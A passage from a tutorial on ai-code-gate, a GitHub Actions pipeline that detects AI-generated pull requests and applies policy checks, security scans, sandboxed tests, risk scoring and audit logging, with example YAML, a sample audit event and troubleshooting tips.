always() on risk assessment. The risk assessment job runs even when upstream jobs fail. If policy checks or scans fail, the risk assessment receives 'false' for the failed job’s outputs (via the || 'false' fallback) and incorporates that into the score. This ensures every AI-generated PR gets a risk assessment and a PR comment regardless of individual stage failures.
Audit as an artifact. The risk assessment action writes audit-event.json with the full assessment details: timestamp, PR number, repository, risk score, tier, breakdown, and the pass/fail status of each upstream stage. This file is uploaded as a GitHub Actions artifact with 90-day retention. For regulated environments, forward these events to your SIEM using a post-job webhook or a separate forwarding workflow.
Audit event example
A complete audit event looks like this:
{
  "timestamp": "2026-03-14T14:25:45Z",
  "event": "risk-assessment",
  "pr_number": "42",
  "repository": "acme/payments-api",
  "risk_score": 0,
  "risk_tier": "LOW",
  "breakdown": {
    "policy": 0,
    "secrets": 0,
    "dependencies": 0,
    "sast": 0,
    "tests": 0,
    "scope": 0
  },
  "policy_passed": true,
  "scan_passed": true,
  "tests_passed": true,
  "findings_count": 0,
  "violations_count": 0
}
Set artifact retention to 90 days or longer to satisfy most compliance frameworks. The audit.retention_days field in your .ai-code-gate.yml documents your intended retention policy alongside the enforcement configuration.
To verify this step, trigger the full workflow on an AI-generated PR, then download the audit artifact from the Actions run. You should see the audit-event.json file in the ai-code-gate-audit artifact.
Using Individual Actions in Your Own Repo
Each composite action can be referenced independently from any repository. You do not need to adopt the full pipeline. To add just detection and policy checks to an existing workflow:
jobs:
  detect:
    runs-on: ubuntu-latest
    outputs:
      is_ai_pr: ${{ steps.detect.outputs.is_ai_pr }}
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0
      - uses: InkByteStudio/ai-code-gate/.github/actions/detect-ai-pr@main
        id: detect
  policy-check:
    needs: detect
    if: needs.detect.outputs.is_ai_pr == 'true'
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@v4
        with:
          node-version: "20"
      - uses: InkByteStudio/ai-code-gate/.github/actions/policy-check@main
Add an .ai-code-gate.yml to your repo root to configure policy rules (see examples/ in the repository for starter configurations).
Common Setup Problems
Gitleaks reports false positives on test fixtures
- Symptom: Gitleaks flags example API keys in test files or documentation.
- Cause: Test fixtures contain strings that match secret patterns.
- Fix: Add a .gitleaks.toml file with [allowlist] rules targeting specific paths or regex patterns for known test values.
Docker build fails in the sandbox step
- Symptom: The sandbox Dockerfile cannot install dependencies or the build context is too large.
- Cause: A missing .dockerignore file causes node_modules, .git, or other large directories to be copied into the build context.
- Fix: Add a .dockerignore that excludes node_modules, .git, dist, and any scan output directories.
Detection always returns false
- Symptom: The is_ai_pr output is always false even for known AI-generated PRs.
- Cause: Shallow clone depth does not include enough history to inspect commit messages, or the AI tool does not add a Co-Authored-By trailer.
- Fix: Ensure fetch-depth: 0 in the checkout step. For tools that do not add trailers, use PR labels as the primary detection signal by adding the appropriate label to your PR.
Sandbox tests time out
- Symptom: The sandbox step runs for the full duration and then fails.
- Cause: Tests are making blocked network calls that hang, or the test suite is too large for the 512MB memory limit.
- Fix: Configure your test runner to skip integration tests that require network access. If the memory limit is the issue, adjust the --memory flag in the sandbox action.
Risk score is always zero
- Symptom: Every AI-generated PR gets a LOW risk score regardless of content.
- Cause: Upstream job outputs are not being passed correctly to the risk assessment job.
- Fix: Verify that each upstream job declares its outputs block and that the risk assessment job references them with the || 'false' fallback pattern shown in the workflow above.
Wrap-Up
You now have a complete AI coding agent governance pipeline with five modular composite actions: AI-generated PR detection using commit metadata, bot authors, and labels; policy-as-code enforcement with allowed and blocked file patterns and scope limits; automated security scanning with gitleaks, npm audit, and Semgrep; sandboxed test execution in a network-isolated, resource-limited Docker container; and risk-tiered review gates with structured audit logging.
The pipeline runs policy checks, security scans, and sandbox tests in parallel, then combines all results into a single risk score that determines review requirements. Every run produces a structured audit event uploaded as a GitHub Actions artifact.
The ai-code-gate on GitHub repository contains all the actions, shared TypeScript modules, tests, example policies, and the complete workflow. For the broader strategy and threat model behind these controls, see the companion blog post: Securing AI Coding Agent Workflows.
Get the free AI Code Governance Checklist →
Related tutorials that extend this work:
- Harden CI/CD with Sigstore, SLSA, SBOMs covers artifact signing, provenance, and supply-chain verification gates for the artifacts your pipeline produces.
- Secure Agentic AI Apps covers guardrails, tool permissions, and audit logging for agentic AI applications that call tools and take actions.
Governance is the missing layer between AI coding tool adoption and enterprise readiness. Teams that ship AI-generated code without detection, policy enforcement, security scanning, sandboxed testing, and risk-based review are accepting unquantified risk. The pipeline you built here makes that risk visible, measurable, and enforceable.